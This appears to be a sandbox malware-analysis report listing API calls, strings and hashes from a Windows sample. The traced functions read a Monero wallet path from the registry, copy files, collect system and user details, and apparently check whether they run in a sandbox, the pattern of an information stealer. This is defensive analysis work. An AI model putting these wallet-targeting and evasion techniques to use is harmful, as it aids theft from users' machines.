RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00D51AD9), ref: 00D51A79
RegQueryValueExA.ADVAPI32(00D51AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00D51A94
RegCloseKey.ADVAPI32(00D51AD9), ref: 00D51A9D

Strings

wallet_path, xrefs: 00D51A8C
SOFTWARE\monero-project\monero-core, xrefs: 00D51A6F

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3466090806-4244082812
Opcode ID: 133722ba522479cbbc82e65b9bcc3be355532e7ae9a832c42a79eeb5b4031425
Instruction ID: 853faccdbab773c07aad3ae588c7a7c0ae5294f96772d99de4e72d945c9e353a
Opcode Fuzzy Hash: 133722ba522479cbbc82e65b9bcc3be355532e7ae9a832c42a79eeb5b4031425
Instruction Fuzzy Hash: 33F05475240308FFEB505B91DC0AF9A7A7CEB44B01F100016FB01E50A1D7B06A54E764

Function 00D67B46 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00D67BD5

Part of subcall function 00D63A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00D63A59

lstrcatA.KERNEL32(?,00000000), ref: 00D67BF2
lstrcatA.KERNEL32(?,?), ref: 00D67C11
lstrcatA.KERNEL32(?,?), ref: 00D67C25
lstrcatA.KERNEL32(?), ref: 00D67C38
lstrcatA.KERNEL32(?,?), ref: 00D67C4C
lstrcatA.KERNEL32(?), ref: 00D67C5F

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D639EE: GetFileAttributesA.KERNEL32(?,?,?,00D5EA72,?,?,?), ref: 00D639F5

Part of subcall function 00D6785A: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00D6787F
Part of subcall function 00D6785A: HeapAlloc.KERNEL32(00000000), ref: 00D67886
Part of subcall function 00D6785A: wsprintfA.USER32 ref: 00D6789F
Part of subcall function 00D6785A: FindFirstFileA.KERNEL32(?,?), ref: 00D678B6
Part of subcall function 00D6785A: StrCmpCA.SHLWAPI(?,00D87AD8), ref: 00D678D7
Part of subcall function 00D6785A: StrCmpCA.SHLWAPI(?,00D87ADC), ref: 00D678F1
Part of subcall function 00D6785A: wsprintfA.USER32 ref: 00D67918
Part of subcall function 00D6785A: CopyFileA.KERNEL32(?,?,00000001), ref: 00D679D5
Part of subcall function 00D6785A: DeleteFileA.KERNEL32(?), ref: 00D679F8

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 1546541418-0
Opcode ID: a036f49261c50d796756712bf76348910ddb0fbd00ee2ca1c07e8ab3dbce7dda
Instruction ID: 000417b2a2a27820856e6385cf74b481d3bd67ae8d86eba1547610385ae1e376
Opcode Fuzzy Hash: a036f49261c50d796756712bf76348910ddb0fbd00ee2ca1c07e8ab3dbce7dda
Instruction Fuzzy Hash: 0A51E9B5A0011C9BCB54DB64CC95ADDB7B9BB4C310F4048E6FB09E3254EA30ABC99F64

Function 00D6278C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D627A0
HeapAlloc.KERNEL32(00000000,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D627A7
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00D878C8,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D627D5
RegQueryValueExA.KERNEL32(00D878C8,00000000,00000000,00000000,000000FF,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D627F1
RegCloseKey.ADVAPI32(00D878C8,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D627FA

Strings

Windows 11, xrefs: 00D627B8

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 9364627a4abc42375945050cfe7eafe6f70b6ba31055bed99f3347d500857b92
Instruction ID: 15a2db42e5372262805b2a900173ce2f6d95d286a0a7dfa63a1c7ebd4c463ac4
Opcode Fuzzy Hash: 9364627a4abc42375945050cfe7eafe6f70b6ba31055bed99f3347d500857b92
Instruction Fuzzy Hash: 0AF04F75640309FFEB109B91DC0AFAA7A7DEB44740F140026FA01D61A1D7B09A50F760

Function 00D62805 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00D62877,00D627B4,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D62819
HeapAlloc.KERNEL32(00000000,?,?,?,00D62877,00D627B4,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D62820
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00D878C8,?,?,?,00D62877,00D627B4,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D6283E
RegQueryValueExA.KERNEL32(00D878C8,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00D62877,00D627B4,?,?,?,00D65BD2,Windows: ), ref: 00D62859
RegCloseKey.ADVAPI32(00D878C8,?,?,?,00D62877,00D627B4,?,?,?,00D65BD2,Windows: ,00D878E0), ref: 00D62862

Strings

CurrentBuildNumber, xrefs: 00D62851

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: d57f62a41b631267c74192eae949d3231aa935c7e90b4288e89721030bf1c0e8
Instruction ID: eee149bf5d84a52937c7635168d7d77feb76ad7baffeab5dfb2dd183301207c6
Opcode Fuzzy Hash: d57f62a41b631267c74192eae949d3231aa935c7e90b4288e89721030bf1c0e8
Instruction Fuzzy Hash: 96F030B1680308BFEB505B91DC4AFAE7A7DEB44B40F100016F601A51A1DBB05A51E760

Function 00D673AA Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D673DF
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 00D673FF
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 00D67425
RegCloseKey.ADVAPI32(?), ref: 00D67431
lstrcatA.KERNEL32(?,?), ref: 00D67460
lstrcatA.KERNEL32(?), ref: 00D67473

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue_memset
String ID:
API String ID: 3891774339-0
Opcode ID: d53e532d49c725407e8b520793d2ffec91e64c477de5a8764e9caead0119c02d
Instruction ID: 540750f880ecfda75d58b0e56a7a74a6ac00fe3d679e16ab34d3c43ff2b763fd
Opcode Fuzzy Hash: d53e532d49c725407e8b520793d2ffec91e64c477de5a8764e9caead0119c02d
Instruction Fuzzy Hash: 3D41807588011DAFCF16EB60DC46AE9B779FB18304F4004A6B908931A1DA755ED9DFB0

Function 00D510E0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 00D5109A
_memset.LIBCMT ref: 00D510C0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 00D510D6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00D69CAB), ref: 00D510F0
VirtualAllocExNuma.KERNEL32(00000000), ref: 00D510F7
ExitProcess.KERNEL32 ref: 00D51102

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 2c3f6d9fff55736ee6e4ce85da60a29b9e6b853a6a1d9ffc2351174f1c2d2127
Instruction ID: e07a8b9cfbdb2f6b959446cfcf51b8bba2364e408cee88307fbc91470f2dfe64
Opcode Fuzzy Hash: 2c3f6d9fff55736ee6e4ce85da60a29b9e6b853a6a1d9ffc2351174f1c2d2127
Instruction Fuzzy Hash: 55F0C27E78136077E62012792C5EFBB2A6C9B42F67F204014FB08EB2C0D661984E9775

Function 00D632E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D6332A

Part of subcall function 00D6421B: malloc.MSVCRT ref: 00D64220
Part of subcall function 00D6421B: strncpy.MSVCRT ref: 00D64231

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 00D63352
lstrcatA.KERNEL32(?,00D87E68,?,?,?,?,?), ref: 00D6336F
GetCurrentHwProfileA.ADVAPI32(?), ref: 00D632FB

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Strings

Unknown, xrefs: 00D63398

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: 5b4a6e214e9b82df92c9bed847d027fe49e924bf139fdbfb6d84979f68d8bb18
Instruction ID: d04a33e4ce5454a4149eef40f824d02cec70a3ff52c2c35bc4287d444dcb3cb1
Opcode Fuzzy Hash: 5b4a6e214e9b82df92c9bed847d027fe49e924bf139fdbfb6d84979f68d8bb18
Instruction Fuzzy Hash: 06114F71A44218ABDF11EB64DC46BDD73B8EF09700F1004E1BA49E7255DA74AF898F74

Function 00D62D75 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00D87950,Display Resolution: ,00D87934,00000000,User Name: ,00D87924,00000000,Computer Name: ,00D87910,AV: ,00D87904,Install Date: ), ref: 00D62D8D
HeapAlloc.KERNEL32(00000000), ref: 00D62D94
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00D62DB0
wsprintfA.USER32 ref: 00D62DD6

Strings

%d MB, xrefs: 00D62DD0

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: c47a0381bcced648dfc5538a59dd6f12c58b31577bc9fa98ec0d101e0cdff5c1
Instruction ID: 37fc0ae30c85f22f439f6f9b451bb558cd618c2fca94867a7ab25c6922e9e423
Opcode Fuzzy Hash: c47a0381bcced648dfc5538a59dd6f12c58b31577bc9fa98ec0d101e0cdff5c1
Instruction Fuzzy Hash: 450186B1A0121CABEB04DFB4DC46ABE77B8FF04301F44042AF502E7291DA70D9019B75

Function 00D549DE Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A10
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A16
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00D54A1C
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00D54A2E
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00D54A36

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: b221f6fe38a5556b563878d07aa4a9901b71f8d3a45a70c7091883f3777d99b4
Instruction ID: 89cef12546bf223de15d3b9cdbca55a2835820243ff49ff92441fad26b056805
Opcode Fuzzy Hash: b221f6fe38a5556b563878d07aa4a9901b71f8d3a45a70c7091883f3777d99b4
Instruction Fuzzy Hash: AE010936D00218ABCF149BA9DC45ADEBFB8AF55330F108216E925E72A0DA7456058FA4

Function 00D62BAD Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000,Local Time: ,00D8796C), ref: 00D62BC1
HeapAlloc.KERNEL32(00000000,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000,Local Time: ,00D8796C,Keyboard Languages: ,00D87950), ref: 00D62BC8
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00D878C8,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000,Local Time: ), ref: 00D62BE6
RegQueryValueExA.KERNEL32(00D878C8,00000000,00000000,00000000,000000FF,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000), ref: 00D62C02
RegCloseKey.ADVAPI32(00D878C8,?,?,?,00D65F8F,Processor: ,[Hardware],00D87990,00000000,TimeZone: ,00D87980,00000000,Local Time: ,00D8796C,Keyboard Languages: ,00D87950), ref: 00D62C0B

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: 458edc58cba36104a433d27ea4cf0ab5339a740574fe362371ac7441212b58a0
Instruction ID: 1a232ed3a30e9f5e4363b7f6941b3a2e91ca91b7359e220e8d78fd9778869464
Opcode Fuzzy Hash: 458edc58cba36104a433d27ea4cf0ab5339a740574fe362371ac7441212b58a0
Instruction Fuzzy Hash: F2F03A75240208BFEB509B91DC0AFAE7A7DFB84740F100126FB01E50A1E7B15A50EB60

Function 00D68B15 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00D68B1C
lstrlenA.KERNEL32(?,0000001C), ref: 00D68B27
StrCmpCA.SHLWAPI(?,ERROR), ref: 00D68BAB

Strings

ERROR, xrefs: 00D68BA3

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
